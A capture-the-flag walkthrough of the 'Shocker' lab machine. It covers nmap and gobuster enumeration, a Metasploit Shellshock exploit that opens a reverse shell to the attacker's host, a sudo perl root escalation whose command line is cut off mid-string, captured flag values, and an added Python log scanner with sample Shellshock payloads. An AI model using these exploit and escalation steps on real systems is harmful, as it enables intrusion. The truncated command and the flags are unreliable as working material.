
Shocker


As usual let's start with nmap:

nmap -sV -sC -p- 10.10.10.56

Port 80 is open so let's check the website:






Let's run gobuster to check for hidden directories:

gobuster dir -u http://10.10.10.56 -w /opt/useful/SecLists/Discovery/Web-Content/common.txt

We found a directory called /cgi-bin, so let's run gobuster again on this directory, this time with file extensions:

gobuster dir -u 10.10.10.56/cgi-bin -w /opt/useful/SecLists/Discovery/Web-Content/big.txt -x php,html,txt,zip,cgi,sh,pl,py

We found 10.10.10.56/cgi-bin/user.sh

Let's check it out:

Let's save this file and check it out:

The machine is named Shocker, which points to Shellshock, the Bash vulnerability that can be reached through CGI scripts served by Apache.

Let's check if there is an exploit in Metasploit:

msfconsole
search shellshock

Let's try exploit/multi/http/apache_mod_cgi_bash_env_exec

use exploit/multi/http/apache_mod_cgi_bash_env_exec

show options

set RHOSTS 10.10.10.56

set LHOST 10.10.14.3

set TARGETURI /cgi-bin/user.sh

exploit

Great! It worked!

getuid

sysinfo

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..
cd ..
cd ..
ls

cd home
ls
cd shelly
ls

cat user.txt

2ec24e11320026d1e70ff3e16695b233

Congratulations! You got the user flag!
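
From the defender's side, the Shellshock request sent to /cgi-bin/user.sh above shows up in the Apache access log whenever the header carrying it is one of the logged fields. The following Python scan is an added example, not part of the original write-up: it assumes the Apache "combined" log format, the log lines are constructed, and the function and variable names are illustrative.

```python
import re

# Assumed Apache "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field; Apache escapes embedded quotes as \"
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'\s*$'
)
# Bash function-definition prefix that Shellshock requests begin with; whitespace may vary.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines (not taken from the machine in this write-up).
SAMPLE_LOG = r'''
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "() { :; }; echo constructed-probe"
192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "(){ :;};echo constructed-probe" "curl/8.0"
192.0.2.77 - - [01/Jan/2024:10:00:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 "-" "curl/8.0"
this line is not in combined format
'''.strip().splitlines()


def find_shellshock(lines):
    """Return (hits, unparsed). hits: requests whose logged fields contain the signature."""
    hits, unparsed = [], []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            unparsed.append(line)  # keep for manual review instead of dropping silently
            continue
        host, when, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "user-agent": agent}
        matched = [name for name, value in fields.items() if SHELLSHOCK_RE.search(value)]
        if matched:
            parts = request.split()
            path = parts[1] if len(parts) >= 2 else request
            hits.append({"client": host, "time": when, "path": path,
                         "status": int(status), "fields": matched})
    return hits, unparsed


if __name__ == "__main__":
    hits, unparsed = find_shellshock(SAMPLE_LOG)
    for h in hits:
        print(f'{h["time"]} {h["client"]} {h["path"]} status={h["status"]} in={",".join(h["fields"])}')
    print(f"{len(unparsed)} line(s) did not parse")
```

A match shows an attempt, not a successful compromise, and a payload sent in a header that is not logged will not appear here at all.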



Privilege Escalation


Let's try the usual command for privilege escalation:

sudo -l

User shelly may run the following commands on Shocker:

/usr/bin/perl


Let's try to execute this command then:

sudo /usr/bin/perl -e 'exec "/bin/s

We get a shell!

whoami

Nice! We have successfully escalated our privileges to root!


Let's now upgrade our shell using:

python3 -c 'import pty;pty.spawn("/bin/bash")'

cd ..
cd ..
ls

cd root
ls
cat root.txt

52c2715605d70c7619030560dc1ca467


Congratulations! You got the root flag!

